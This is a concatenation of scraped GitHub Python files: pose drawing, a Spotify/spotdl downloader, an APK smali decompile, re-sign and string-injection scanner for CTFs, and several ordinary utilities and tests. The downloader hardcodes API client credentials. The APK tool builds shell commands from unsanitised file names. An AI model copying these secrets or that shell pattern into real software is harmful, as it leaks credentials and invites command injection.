r = outputs['angle_r_fc'][0][0]\n y = outputs['angle_y_fc'][0][0]\n\n\n if display_flag:\n cv2.putText(image,\"y:{:.1f}\".format(y), (20,20), 0, 0.6, (255,255,0))\n cv2.putText(image,\"p:{:.1f}\".format(p), (20,40), 0, 0.6, (255,255,0))\n cv2.putText(image,\"r:{:.1f}\".format(r), (20,60), 0, 0.6, (255,255,0))\n \n xmin, ymin,_ , _ = facebox\n face_center = (xmin + face.shape[1] / 2, ymin + face.shape[0] / 2, 0)\n focal_length = 950.0\n scale = 50\n image = self.draw_axes(image, face_center, y, p, r, scale, focal_length)\n\n return image, (p, r, y)\n\n # from : https://knowledge.udacity.com/questions/171017\n def draw_axes(self, frame, center_of_face, yaw, pitch, roll, scale, focal_length):\n yaw *= np.pi / 180.0\n pitch *= np.pi / 180.0\n roll *= np.pi / 180.0\n cx = int(center_of_face[0])\n cy = int(center_of_face[1])\n Rx = np.array([[1, 0, 0],\n [0, math.cos(pitch), -math.sin(pitch)],\n [0, math.sin(pitch), math.cos(pitch)]])\n Ry = np.array([[math.cos(yaw), 0, -math.sin(yaw)],\n [0, 1, 0],\n [math.sin(yaw), 0, math.cos(yaw)]])\n Rz = np.array([[math.cos(roll), -math.sin(roll), 0],\n [math.sin(roll), math.cos(roll), 0],\n [0, 0, 1]])\n # R = np.dot(Rz, Ry, Rx)\n # ref: https://www.learnopencv.com/rotation-matrix-to-euler-angles/\n # R = np.dot(Rz, np.dot(Ry, Rx))\n R = Rz @ Ry @ Rx\n # print(R)\n camera_matrix = self.build_camera_matrix(center_of_face, focal_length)\n xaxis = np.array(([1 * scale, 0, 0]), dtype='float32').reshape(3, 1)\n yaxis = np.array(([0, -1 * scale, 0]), dtype='float32').reshape(3, 1)\n zaxis = np.array(([0, 0, -1 * scale]), dtype='float32').reshape(3, 1)\n zaxis1 = np.array(([0, 0, 1 * scale]), dtype='float32').reshape(3, 1)\n o = np.array(([0, 0, 0]), dtype='float32').reshape(3, 1)\n o[2] = camera_matrix[0][0]\n xaxis = np.dot(R, xaxis) + o\n yaxis = np.dot(R, yaxis) + o\n zaxis = np.dot(R, zaxis) + o\n zaxis1 = np.dot(R, zaxis1) + o\n xp2 = (xaxis[0] / xaxis[2] * camera_matrix[0][0]) + cx\n yp2 = (xaxis[1] / xaxis[2] * camera_matrix[1][1]) + cy\n p2 = (int(xp2), int(yp2))\n cv2.line(frame, (cx, cy), p2, (0, 0, 255), 2)\n xp2 = (yaxis[0] / yaxis[2] * camera_matrix[0][0]) + cx\n yp2 = (yaxis[1] / yaxis[2] * camera_matrix[1][1]) + cy\n p2 = (int(xp2), int(yp2))\n cv2.line(frame, (cx, cy), p2, (0, 255, 0), 2)\n xp1 = (zaxis1[0] / zaxis1[2] * camera_matrix[0][0]) + cx\n yp1 = (zaxis1[1] / zaxis1[2] * camera_matrix[1][1]) + cy\n p1 = (int(xp1), int(yp1))\n xp2 = (zaxis[0] / zaxis[2] * camera_matrix[0][0]) + cx\n yp2 = (zaxis[1] / zaxis[2] * camera_matrix[1][1]) + cy\n p2 = (int(xp2), int(yp2))\n cv2.line(frame, p1, p2, (255, 0, 0), 2)\n cv2.circle(frame, p2, 3, (255, 0, 0), 2)\n return frame\n\n\n # from : https://knowledge.udacity.com/questions/171017\n def build_camera_matrix(self, center_of_face, focal_length):\n cx = int(center_of_face[0])\n cy = int(center_of_face[1])\n camera_matrix = np.zeros((3, 3), dtype='float32')\n camera_matrix[0][0] = focal_length\n camera_matrix[0][2] = cx\n camera_matrix[1][1] = focal_length\n camera_matrix[1][2] = cy\n camera_matrix[2][2] = 1\n return camera_matrix\n","repo_name":"BrainTheos/openvino-computer-pointer-controller-project","sub_path":"starter/src/head_pose_estimation.py","file_name":"head_pose_estimation.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40653973084","text":"from spotdl.download import DownloadManager\nfrom spotdl.parsers import parse_query\nfrom spotdl.search import SpotifyClient, SongObject, from_spotify_url\nfrom spotdl.providers import metadata_provider\nfrom spotdl.utils.song_name_utils import format_name\n\nimport sqlite3\nimport os\nimport shutil\n\n# Initialize spotify client id & secret is provided by spotdl no need to keep secret\nSpotifyClient.init(\n client_id=\"5f573c9620494bae87890c0f08a60293\",\n client_secret=\"212476d9b0f3472eaa762d90b19b0ba8\",\n user_auth=False,\n)\n\ndef search_query(query: str):\n \"\"\"\n THIS FUNCTION TAKES search query AS INPUT AND RETURN\n a `list`.\n \"\"\" \n songs = [] # This list contains searchSongObject for each song\n list_song_urls = []\n # get a spotify client\n spotify_client = SpotifyClient()\n\n # Use spotify search\n search_results = spotify_client.search(query, type=\"track\")\n\n number_of_search_results = len(search_results.get(\"tracks\", {}).get(\"items\", []))\n\n # return first result link or if no matches are found, raise Exception\n if search_results is None or number_of_search_results == 0:\n raise Exception(\"No song matches found on Spotify\")\n\n # Adds each song url to list_song_urls\n for i in range(0, number_of_search_results):\n # Get the Song Metadata\n song_url = \"http://open.spotify.com/track/\" + search_results[\"tracks\"][\"items\"][i][\"id\"]\n raw_track_meta, raw_artist_meta, raw_album_meta = metadata_provider.from_url(song_url)\n\n # for searchSongObject\n song_name = search_results[\"tracks\"][\"items\"][i][\"name\"]\n cover_url = search_results[\"tracks\"][\"items\"][i][\"album\"][\"images\"][0][\"url\"]\n contributing_artists = [artist[\"name\"] for artist in raw_track_meta[\"artists\"]] \n duration = search_results[\"tracks\"][\"items\"][i][\"duration_ms\"] / 1000 # convert to seconds\n\n list_song_urls.append(song_url)\n # create SongObject and append to songs[]\n song = searchSongObject(song_url, contributing_artists, song_name, duration, cover_url)\n songs.append(song)\n\n return songs\n\n# This is to display in /search because creating SongObject would mean you have to use youtube API, which takes too long\nclass searchSongObject:\n def __init__(self,\n spotify_url: str,\n contributing_artists: list,\n song_name: str,\n duration: float, \n album_cover_url: str) -> None:\n\n self._spotify_url = spotify_url\n self._contributing_artists = contributing_artists\n self._song_name = song_name\n self._duration = duration\n self._album_cover_url = album_cover_url\n \n @property\n def spotify_url(self):\n return self._spotify_url\n \n @property\n def contributing_artists(self):\n return self._contributing_artists\n \n @property\n def song_name(self):\n return self._song_name\n \n @property\n def duration(self):\n return self._duration\n \n @property\n def album_cover_url(self):\n return self._album_cover_url\n\n @property\n def file_name(self):\n return self.create_file_name(self._song_name, self._contributing_artists)\n\n @staticmethod\n def create_file_name(song_name: str, song_artists: list[str]) -> str:\n # build file name of converted file\n # the main artist is always included\n artist_string = song_artists[0]\n\n # ! we eliminate contributing artist names that are also in the song name, else we\n # ! would end up with things like 'Jetta, Mastubs - I'd love to change the world\n # ! (Mastubs REMIX).mp3' which is kinda an odd file name.\n for artist in song_artists[1:]:\n if artist.lower() not in song_name.lower():\n artist_string += \", \" + artist\n\n converted_file_name = artist_string + \" - \" + song_name\n\n return format_name(converted_file_name)\n\nclass ManageDownloads:\n \"\"\"\n Download songs as .oggs files by using Spotify search API on title and artist\n name in track_metadata.db & spotdl and saves it in a folder\n \"\"\"\n def __init__(self):\n # track_metadata.db has one table called songs\n # Establish connection and init cursor to database \n self.connection = sqlite3.connect(\"track_metadata.db\")\n self.cursor = self.connection.cursor()\n print(\"Successfully connected to db\\n\")\n def download_songs_using_track_metadata_db(self):\n ret = []\n self.cursor.execute(\"SELECT title, artist_name FROM songs LIMIT 20\")\n data = self.cursor.fetchall()\n\n if os.path.isdir(\"./songs\"):\n pass\n else:\n os.makedirs(\"./songs\")\n\n for row in range(len(data)):\n # data[row][0] = title # of song\n # data[row][1] = artist_name # of song\n if data[row][0] == '' or data[row][1] == '':\n continue\n # title, artist_name\n search_param = f\"{data[row][0]}, {data[row][1]}\"\n print(f\"Searching '{search_param}' using Spotify search API...\")\n spotify_url = \"\"\n try: \n spotify_url = search_query(search_param)[0].spotify_url\n except:\n print(f\"failed to find match on Spotify\\n\")\n continue\n\n print(f\"{spotify_url}\\n\")\n spotdl_opts = {\n \"query\": [spotify_url],\n \"output_format\": \"ogg\",\n \"download_threads\": 1, \n \"path_template\": None,\n \"use_youtube\": False,\n \"generate_m3u\": False,\n \"search_threads\": 1, \n }\n # song_obj is a SongObject from spotdl.search.SongObject\n song_obj = parse_query(\n spotdl_opts[\"query\"],\n spotdl_opts[\"output_format\"],\n spotdl_opts[\"download_threads\"],\n spotdl_opts[\"path_template\"],\n spotdl_opts[\"use_youtube\"],\n spotdl_opts[\"generate_m3u\"],\n spotdl_opts[\"search_threads\"],\n )\n if os.path.isfile(f\"./{song_obj[0].file_name}.ogg\") or os.path.isfile(f\"./songs/{song_obj[0].file_name}.ogg\"):\n # change download status by changing downloaded column in db\n self.cursor.execute(\"UPDATE songs SET downloaded=? WHERE title=? AND artist_name=?\", [1, data[row][0], data[row][1]])\n self.connection.commit()\n # if file name already exists skip download\n print(f\"{song_obj[0].file_name}.ogg already downloaded\")\n continue \n try:\n DownloadManager(spotdl_opts).download_single_song(song_obj[0])\n # Move to ./songs directory)\n shutil.move(f\"{song_obj[0].file_name}.ogg\", './songs/')\n # change download status by changing downloaded column in db\n self.cursor.execute(\"UPDATE songs SET downloaded=? WHERE title=? AND artist_name=?\", [1, data[row][0], data[row][1]])\n self.connection.commit()\n except OSError:\n continue\n \n #print(bytes(data[17][0], 'utf-8').decode('unicode_escape'))\n \ndef main():\n data = ManageDownloads()\n data.download_songs_using_track_metadata_db()\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"bobcoi03/SongRecommendation","sub_path":"src/data/download_oggs.py","file_name":"download_oggs.py","file_ext":"py","file_size_in_byte":7402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8006780100","text":"# !/usr/bin/env python3\n\nimport os\nimport re\nfrom colorama import Fore\n\n\ndef smali_de(apk_name):\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"SOURCE EXTRATION IN SMALI\\n\")\n snamesplit = apk_name.split('.')[0]\n print(Fore.YELLOW)\n smalicmd = 'java -jar tools/apktool.jar d -f ' + apk_name + ' -o Bytecode'\n os.system(smalicmd)\n if os.path.isdir(snamesplit):\n print(Fore.BLUE + \"\\n\\t[+] \" + Fore.YELLOW + \"Extraction complete\")\n\n\ndef smali_re(apk_name):\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"RECOMPILING SMALI\")\n snamesplit = apk_name.split('.')[0]\n if os.path.isdir(snamesplit):\n smalicmd = 'java -jar tools/apktool.jar b -f Bytecode' \n os.system(smalicmd)\n print(Fore.YELLOW)\n print(Fore.BLUE + \"\\n\\t[+] \" + Fore.YELLOW + \"Recompiling complete.\")\n print(Fore.BLUE + \"\\n\\t[+] \" + Fore.YELLOW + \"The recompiled apk in Bytecode/dist/Bytecode.apk\\n\")\n else:\n print(Fore.RED + \"\\n\\t[!] smali source not found\")\n\n\ndef apk_sign(apk_name):\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"SIGNING APK\")\n snamesplit = apk_name.split('.')[0]\n sdir = snamesplit + '/dist/' + snamesplit + '.apk'\n if os.path.exists(sdir):\n signcmd = 'java -jar tools/sign.jar Bytecode/dist/Bytecode.apk'\n os.system(signcmd)\n print(Fore.YELLOW)\n msg = \"Signed APK found as: \" + snamesplit + \"/dist/Bytecode.s.apk\"\n print(Fore.BLUE + \"[+] \" + Fore.YELLOW + msg)\n else:\n print(Fore.RED + \"\\n\\t[!] file not found\")\n\n\n# noinspection PyUnusedLocal,PyUnusedLocal,PyUnusedLocal\ndef inj_check(apk_name, flag_format=''):\n snamesplit = apk_name.split('.')[0]\n if os.path.isdir('Bytecode') == 0:\n print(Fore.RED + \"\\n\\t[!] bytecode not found. Extracting\")\n smali_de(apk_name)\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"CHECKING FOR BYTECODE INJECTIONS\\n\\n\")\n inj_points = 0\n flag_count = 0\n check = 0\n url_count = 0\n urls = []\n smali_dir = 'smali'\n flag_regex = re.compile(r\"\" + str(flag_format) + \"{[a-z0-9]}*\", re.IGNORECASE)\n url_regex = 'https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+'\n flags = []\n if os.path.isdir('smali_analysis'):\n os.system('rm -r smali_analysis')\n os.system('cp -R Bytecode/' + smali_dir + ' smali_analysis')\n if os.path.isdir('smali_analysis'):\n os.chdir('smali_analysis')\n ignore_dirs = ['android', 'org', 'google', 'localytics']\n for dirList, subdirList, subfiles in os.walk(os.getcwd()):\n # noinspection PyAssignmentToLoopOrWithParameter\n for subfiles in ignore_dirs:\n os.system('rm -r ' + subfiles + ' 2> /dev/null')\n # noinspection PyAssignmentToLoopOrWithParameter\n for subdirList in ignore_dirs:\n os.system('rm -r ' + subdirList + ' 2> /dev/null')\n # noinspection PyAssignmentToLoopOrWithParameter\n for dirList in ignore_dirs:\n os.system('rm -r ' + dirList + ' 2> /dev/null')\n\n for dirList, subdirList, subfiles in os.walk(os.getcwd()):\n for files in subfiles:\n with open(os.path.abspath(os.path.join(dirList, files))) as f:\n for lines in f:\n pattern1 = 'const-string'\n if re.search(flag_regex, lines):\n flags.append(lines)\n if re.search(url_regex, lines):\n urls.append(lines)\n if pattern1 in lines:\n inj_points += 1\n to_write = \"\\n\\t\" + os.path.basename(f.name) + \"\\t:\" + lines\n if os.path.exists(\"smali_analysis/str_inj.txt\"):\n os.system(\"rm -r smali_analysis/str_inj.txt\")\n with open(\"str_inj.txt\", \"a+\") as strfile:\n strfile.write(to_write)\n if 0 < inj_points < 10 and len(lines) < 100:\n print(Fore.BLUE + \"\\t[>] \" + Fore.YELLOW + os.path.basename(f.name) + \"\\t:\" + lines)\n else:\n check = 1\n\n print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + str(inj_points) + \" strings found. Injections possible\\n\")\n if check == 1:\n print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + \"Constant strings written to 'str_inj.txt' file in 'smali_analysis' directory\\n\")\n\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"SEARCHING FOR CTF FLAGS\\n\")\n if flags:\n with open(\"ctf_flags.txt\", \"a+\") as ctf_file:\n for flag in flags:\n start = flag.find(flag_format)\n end = flag[start:].find('}') + 1\n if start is not -1 and flag[start:end] != \"\":\n flag_count += 1\n ctf_file.write(\"\\n\" + flag[start:end])\n if 0 < flag_count < 10:\n print(\"\\n\\t\" + Fore.BLUE + \"[>] \" + Fore.YELLOW + flag[start:end])\n if flag_count == 0:\n print(Fore.RED + \"\\n\\t[-] No flags found \")\n exit(0)\n print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + str(flag_count) + \" flag formats found\")\n print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + \"All the flags written to 'ctf_flags.txt' file in \" + Fore.BLUE + \"'smali_analysis'\" + Fore.YELLOW + \"directory\")\n\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"SEARCHING FOR URLs\\n\\n\")\n if urls:\n with open(\"urls.txt\", \"a+\") as url_file:\n for foundurls in urls:\n url_file.write(foundurls.split()[2][1:-1] + \"\\n\")\n url_count += 1\n if 0 < url_count < 10:\n print(Fore.BLUE + \"\\t[>] \" + Fore.YELLOW + foundurls.split()[2][1:-1])\n print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + str(url_count) + \" urls found\")\n print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + \"All the URLs written to 'urls.txt' file in \" + Fore.BLUE + \"'smali_analysis'\" + Fore.YELLOW + \" directory\")\n","repo_name":"SamarthSriv/Aegis","sub_path":"recons/smali_extract.py","file_name":"smali_extract.py","file_ext":"py","file_size_in_byte":6454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71196697334","text":"# Creating a class called Node\nclass Node:\n # Constructor and self\n def __init__(self, data, next_node=None):\n self.data = data\n self.next_node = next_node\n\n# Reverse Linked List Function\ndef reverse_linked_list(starting_head_node):\n current_node = starting_head_node # We will always start with the starting_head_node\n # and set the starting_head_node node as current\n\n previous_node = None # Previous node is set to null\n\n while current_node is not None: # While the current_node is not\n # null keep looping\n\n next_node = current_node.next_node # Assign the next_node to the\n # next_node of the current_node\n\n current_node.next_node = previous_node # Assign the next_node of the\n # current_node to the previous_node\n\n previous_node = current_node # Assign the previous_node to\n # the current_node\n\n current_node = next_node # Assign the current_node to the\n # next_node\n\n return previous_node # Returning previous_node\n\n# Printing the Linked List\ndef linked_list(starting_head_node):\n structure = \"\" # Blank\n current_node = starting_head_node\n # Using loop to print the list\n while current_node:\n structure = structure + str(current_node.data) + \" --> \"\n current_node = current_node.next_node\n print(structure)\n\n# Testing Data\nprint(\"\\nGiven Linked List:\")\nstarting_head_node = Node(1, Node(2, Node(3, Node(4, Node(5)))))\nlinked_list(starting_head_node)\nprint(\"\\nReversed Linked List:\")\nrev = reverse_linked_list(starting_head_node)\nlinked_list(rev)\n\n# Output:\n# Given Linked List:\n# 1 --> 2 --> 3 --> 4 --> 5 --> \n\n# Reversed Linked List:\n# 5 --> 4 --> 3 --> 2 --> 1 --> \n\n","repo_name":"bootkernel/Interview-Questions","sub_path":"reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73247459254","text":"from datetime import datetime\n\nfrom odoo import _, fields, models\nfrom odoo.exceptions import UserError\nfrom odoo.tools import date_utils\n\n\nclass VehicleChangeHistory(models.TransientModel):\n \"\"\"Vehicle Change History.\"\"\"\n\n _name = \"vehicle.change.history\"\n _description = \"Vehicle Change History\"\n\n fleet_id = fields.Many2one(\"fleet.vehicle\", string=\"Vehicle-ID\")\n date_from = fields.Date(default=date_utils.start_of(datetime.now(), \"month\"))\n date_to = fields.Date(default=date_utils.end_of(datetime.now(), \"month\"))\n report_type = fields.Selection(\n [\n (\"engine_history\", \"Engine History\"),\n (\"color_history\", \"Color History\"),\n (\"tire_history\", \"Tire History\"),\n (\"battery_history\", \"Battery History\"),\n ],\n default=\"color_history\",\n )\n\n def print_report(self):\n \"\"\"Method to print report.\"\"\"\n for rec in self:\n if not rec.date_from and not rec.date_to:\n raise UserError(\n _(\n \"User Error!\\n 'Please select criteria \"\n \"to create Vehicle Change History Report!\"\n )\n )\n if rec.date_from and rec.date_to and rec.date_from > rec.date_to:\n raise UserError(\n _(\"User Error!\\n Date To' must \" \"be greater than 'Date From'!\")\n )\n data = {\n \"form\": {\n \"date_from\": rec.date_from or False,\n \"date_to\": rec.date_to or False,\n \"fleet_id\": rec.fleet_id and rec.fleet_id.id or False,\n \"report\": rec.report_type,\n }\n }\n return self.env.ref(\n \"fleet_operations.action_report_vehicle_change_history\"\n ).report_action(self, data=data, config=False)\n","repo_name":"JayVora-SerpentCS/fleet_management","sub_path":"fleet_operations/wizard/vehicle_change_history.py","file_name":"vehicle_change_history.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"70113346292","text":"import time\nimport json\nimport copy\nimport os\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nfrom dotenv import load_dotenv\nload_dotenv() \n\ndef get_firestore_env_var():\n try:\n # this isn't letting us use env vars for some reason. fix later & use service accounts \n # json_content = os.environ.get('FIRESTORE_APPLICATION_CREDENTIALS', 'Specified environment variable for the firestore is not set.')\n # cred = json.loads(json_content)\n cred = credentials.Certificate(\"/Users/adam/development/ps5-stock-selector-config/ps5-stock-selector-firebase.json\")\n return cred\n except:\n cred = credentials.Certificate()\n return cred\n \n# cred = credentials.Certificate(get_firestore_env_var() )\n\nfirebase_admin.initialize_app(get_firestore_env_var())\n\ndef throttle_check_store_sku(store_sku):\n \"\"\" Will look at the last time we sent a message for the store and then \n decide if we want to throttle\n \"\"\"\n db = firestore.client()\n document_ref = db.collection('throttle').document(store_sku)\n print(f\"looking for {store_sku}\")\n document = document_ref.get().to_dict()\n print(document)\n ouput = document['last_sent']\n \n return ouput\n\ndef throttle_update_store_sku(store_sku, time_value=int(time.time()) ):\n \"\"\" Will update the store sku timestamp with the latest time\n \"\"\"\n \n # time_now = int(time.time()) #epoch time int\n db = firestore.client()\n batch = db.batch()\n\n document_ref = db.collection(u'throttle').document(store_sku)\n batch.update(document_ref, {u'last_sent': time_value})\n\n batch.commit()\n\ndef throttle_dict(input_dict, throttle_time_secs=1200):\n \"\"\"\n Takes the dictionary of stores which have matches \n and will see if we're okay to let them through. \n Will return dict with stores which are okay to send \n based on the rules we specify in the ENVIRONMENT VARIABLE for \n THROTTLE_TIME\n Default is 20 mins (1200seconds)\n \"\"\"\n output_dict = copy.deepcopy(input_dict) #deep copy will allow us to work with this copy uniquely\n\n for key in input_dict:\n for sku in [\"disc\",\"digital\"]:\n if input_dict[key][sku] != None and input_dict[key][sku] != \"\":\n firestore_key = f\"{key}_{sku}\"\n time_now = int(time.time())\n last_sent = throttle_check_store_sku(firestore_key)\n if time_now < (last_sent + throttle_time_secs):\n output_dict[key][sku] = None #clear the value since we've sent it recently\n print(f\"We're not going to send an update for {firestore_key} as we notified less than {throttle_time_secs} seconds ago\")\n else:\n throttle_update_store_sku(firestore_key,time_now)\n\n return output_dict\n\n\n# print(throttle_check_store_sku(\"amazon_digital\") )","repo_name":"anthonypiccolo/ps5-stock-checker-backend","sub_path":"src/messaging/throttle.py","file_name":"throttle.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2494380820","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom blog.models import Recipe, Ingredient, Comment\n\n\nclass IngredientModelTest(TestCase):\n \"\"\"Tests for the Ingredient model.\"\"\"\n\n def test_string_representation(self):\n \"\"\"Checks if string representation returns the ingredient's name.\"\"\"\n recipe = Recipe.objects.create(\n title=\"Test Recipe\", slug=\"test-recipe\", estimated_time=30\n )\n ingredient = Ingredient.objects.create(\n recipe=recipe,\n ingredient=\"Sample Ingredient\",\n unit=\"kg\",\n amount=5\n )\n self.assertEqual(str(ingredient), \"Sample Ingredient\")\n\n\nclass RecipeModelTest(TestCase):\n \"\"\"Tests for the Recipe model.\"\"\"\n\n def test_ordering(self):\n \"\"\"\n Checks if recipes are ordered by their creation in descending order.\n \"\"\"\n Recipe.objects.create(\n title=\"Recipe 1\", slug=\"recipe-1\", estimated_time=30\n )\n Recipe.objects.create(\n title=\"Recipe 2\", slug=\"recipe-2\", estimated_time=40\n )\n recipes = Recipe.objects.all()\n self.assertEqual(recipes[0].title, \"Recipe 2\")\n self.assertEqual(recipes[1].title, \"Recipe 1\")\n\n def test_slug_uniqueness(self):\n \"\"\"Verifies that the slug field is unique.\"\"\"\n Recipe.objects.create(\n title=\"Recipe 1\", slug=\"recipe-1\", estimated_time=30\n )\n with self.assertRaises(Exception):\n Recipe.objects.create(\n title=\"Recipe 2\", slug=\"recipe-1\", estimated_time=40\n )\n\n def test_number_of_likes(self):\n \"\"\"Verifies that the number_of_likes method returns correct count.\"\"\"\n user1 = User.objects.create(username=\"user1\")\n user2 = User.objects.create(username=\"user2\")\n recipe = Recipe.objects.create(\n title=\"Recipe\", slug=\"recipe\", estimated_time=30\n )\n recipe.likes.add(user1, user2)\n self.assertEqual(recipe.number_of_likes(), 2)\n\n\nclass CommentModelTest(TestCase):\n \"\"\"Tests for the Comment model.\"\"\"\n\n def test_string_representation(self):\n \"\"\"\n Verifies correct string format 'Comment {comment_body} by {user_name}'.\n \"\"\"\n recipe = Recipe.objects.create(\n title=\"Test Recipe\", slug=\"test-recipe\", estimated_time=30\n )\n comment = Comment.objects.create(\n name=\"User 1\", body=\"Comment 1\", recipe=recipe\n )\n self.assertEqual(str(comment), \"Comment Comment 1 by User 1\")\n\n def test_comment_ordering(self):\n \"\"\"Checks if comments are ordered by their creation order.\"\"\"\n recipe = Recipe.objects.create(\n title=\"Test Recipe\", slug=\"test-recipe\", estimated_time=30\n )\n Comment.objects.create(\n name=\"User 1\", body=\"Comment 1\", recipe=recipe\n )\n Comment.objects.create(\n name=\"User 2\", body=\"Comment 2\", recipe=recipe\n )\n comments = Comment.objects.all()\n self.assertEqual(comments[0].body, \"Comment 1\")\n self.assertEqual(comments[1].body, \"Comment 2\")\n","repo_name":"Haniibani/Portfolio-project-4","sub_path":"blog/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31847397373","text":"import re\r\nimport sys\r\n\r\n\r\ndef match_regex(filename, regex):\r\n with open(filename) as file:\r\n lines = file.readlines()\r\n for line in reversed(lines):\r\n match = re.match(regex, line)\r\n if match:\r\n regex = yield match.groups()[0]\r\n\r\n\r\ndef get_serials(filename):\r\n ERROR_RE = \"XFS ERROR (\\[sd[a-z]\\])\"\r\n matcher = match_regex(filename, ERROR_RE)\r\n device = next(matcher)\r\n while True:\r\n try:\r\n bus = matcher.send(\r\n \"(sd \\S+) {}.*\".format(re.escape(device)))\r\n serial = matcher.send(\"{} \\(SERIAL=([^)]*)\\)\".format(bus))\r\n yield serial\r\n device = matcher.send(ERROR_RE)\r\n except StopIteration:\r\n matcher.close()\r\n return\r\n\r\n\r\n# get file name from input command line\r\nfile = sys.argv[1]\r\nfor serial_number in get_serials(file):\r\n print(serial_number)\r\n","repo_name":"LesterBryanIlao/Python3ObjectOrientedProgramming","sub_path":"Chapter9/coroutine.py","file_name":"coroutine.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27496534791","text":"# -*- coding: utf-8 -*-\n\nfrom rwslib.builders.common import ODMElement, dt_to_iso8601\nfrom rwslib.builders.clinicaldata import LocationRef\nfrom rwslib.builders.constants import LocationType, UserType\nfrom rwslib.builders.modm import LastUpdateMixin\n\n\nclass AdminData(ODMElement):\n \"\"\"\n Administrative information about users, locations, and electronic signatures.\n \"\"\"\n def __init__(self, study_oid=None):\n \"\"\"\n :param str study_oid: OID pointing to the StudyDef\n \"\"\"\n super(AdminData, self).__init__()\n self.study_oid = study_oid\n self.users = []\n self.locations = []\n # SignatureDef\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = {}\n if self.study_oid:\n params.update(dict(StudyOID=self.study_oid))\n builder.start(\"AdminData\", params)\n for user in self.users:\n user.build(builder)\n for location in self.locations:\n location.build(builder)\n\n builder.end(\"AdminData\")\n\n def __lshift__(self, other):\n \"\"\"Override << operator\"\"\"\n\n if not isinstance(other, (User, Location,)):\n raise ValueError('{0} cannot accept a {1} as a child element'.format(self.__class__.__name__,\n other.__class__.__name__))\n\n self.set_list_attribute(other, User, 'users')\n self.set_list_attribute(other, Location, 'locations')\n\n return other\n\n\nclass MetaDataVersionRef(ODMElement):\n \"\"\"\n A reference to a MetaDataVersion used at the containing Location. \n The EffectiveDate expresses the fact that the metadata used at a location can vary over time.\n \"\"\"\n def __init__(self, study_oid, metadata_version_oid, effective_date):\n \"\"\"\n :param str study_oid: References the :class:`Study` that uses this metadata version.\n :param str metadata_version_oid: References the :class:`rwslib.builders.MetaDataVersion` (within the above Study).\n :param datetime.datetime effective_date: Effective Date for this version and Site\n \"\"\"\n super(MetaDataVersionRef, self).__init__()\n self.study_oid = study_oid\n self.metadata_version_oid = metadata_version_oid\n self.effective_date = effective_date\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = dict(StudyOID=self.study_oid,\n MetaDataVersionOID=self.metadata_version_oid,\n EffectiveDate=dt_to_iso8601(self.effective_date))\n builder.start(\"MetaDataVersionRef\", params)\n builder.end(\"MetaDataVersionRef\")\n\n\nclass Location(ODMElement, LastUpdateMixin):\n \"\"\"\n A physical location -- typically a clinical research site or a sponsor's office.\n \"\"\"\n def __init__(self, oid, name,\n location_type=None,\n metadata_versions=None):\n \"\"\"\n :param str oid: OID for the Location, referenced in :class:`LocationRef`\n :param str name: Name for the Location\n :param rwslib.builder_constants.LocationType location_type: Type for this Location\n :param list(MetaDataVersionRef) metadata_versions: The :class:`MetaDataVersionRef` for this Location\n \"\"\"\n super(Location, self).__init__()\n self.oid = oid\n self.name = name\n self._location_type = None\n if location_type:\n self.location_type = location_type\n self.metadata_versions = []\n if metadata_versions:\n if isinstance(metadata_versions, (tuple, list)):\n for mdv in metadata_versions:\n self << mdv\n elif isinstance(metadata_versions, (MetaDataVersionRef,)):\n self << metadata_versions\n\n @property\n def location_type(self):\n return self._location_type\n\n @location_type.setter\n def location_type(self, value):\n if not isinstance(value, (LocationType,)):\n raise ValueError(\"{} is not a LocationType\".format(type(value)))\n self._location_type = value\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = dict(OID=self.oid,\n Name=self.name)\n if self.location_type:\n params.update(dict(LocationType=self.location_type.value))\n # mixins\n self.mixin()\n self.mixin_params(params)\n builder.start(\"Location\", params)\n for mdv in self.metadata_versions:\n mdv.build(builder)\n builder.end(\"Location\")\n\n def __lshift__(self, other):\n \"\"\"Override << operator\"\"\"\n if not isinstance(other, 